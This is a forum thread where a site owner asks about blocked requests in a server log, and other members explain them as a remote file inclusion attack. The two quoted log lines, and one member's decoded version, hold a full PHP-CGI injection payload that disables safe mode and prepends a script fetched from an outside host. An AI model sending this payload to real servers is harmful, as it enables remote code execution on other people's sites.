Welcome to WebmasterWorld Guest from 54.162.168.187

Forum Moderators: Ocean10000 & incrediBILL & keyplyr

Message Too Old, No Replies

GET Request

     
7:38 pm on Nov 16, 2012 (gmt 0)

New User

joined:Oct 9, 2012
posts:34
votes: 0


The php got it 403'd

However, I do not have the savvy to understand this request.

<> SPRINT-WIRELESS

68.240.0.0/13 = 68.240.0.0 - 68.247.255.255

68.240.116.xxx - - [16/Nov/2012:06:14:36 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F211.172.112.7%3A8080%2Fecho.txt HTTP/1.1" 403 3251 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"

TIA,
Ken

[edited by: incrediBILL at 5:20 am (utc) on Nov 17, 2012]
[edit reason] added line breaks [/edit]

9:22 am on Nov 17, 2012 (gmt 0)

Moderator This Forum from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:8361
votes: 340


This is obviously a hack attempt, trying to inject a script. I wonder if you sent a complaint to SPRINT w/ log snippet whether they'd take any action?
9:40 am on Nov 17, 2012 (gmt 0)

Junior Member

10+ Year Member

joined:Nov 1, 2006
posts: 66
votes: 0


It's a variant of the Remote File Inclusion exploit, attempting to pull in a bad file named 'echo.txt' from port 8080 on a server in Seoul, Korea (211.172.112.n:8080).
The Korean organization is 'Iosystem' (211.172.112.0/23), who live at the unfortunately-named 'Sukchon-Dong, Songpa-gu'. Go figure.
10:17 am on Nov 17, 2012 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13682
votes: 446


It's a little more intelligible if you decode:

-dsafe_mode=Off
+-ddisable_functions=NULL
+-dallow_url_fopen=On
+-dallow_url_include=On
+-dauto_prepend_file=http://{filename as identified by iamzippy, above}

I suppose Dong in Korean means something utterly boring like Smith or Street. (I asked g###, but the translator played dumb because it wasn't in Korean script.)

:: off to see if URL is duly mentioned in htaccess ::
12:03 pm on Nov 18, 2012 (gmt 0)

New User

joined:Oct 9, 2012
posts:34
votes: 0


Thanks everyone, I've lurking around for about 3 years now and I have learned a lot from you folks - your expertise has been a great help.

Ken
10:03 pm on Nov 25, 2012 (gmt 0)

New User

joined:Oct 9, 2012
posts:34
votes: 0


Different IP - almost same Request & UA

67.181.147.xxx - - [25/Nov/2012:06:48:27 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F50.22.136.150%3A8080%2Fecho.txt HTTP/1.1" 403 3195 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

Featured Threads

Free SEO Tools

Hire Expert Members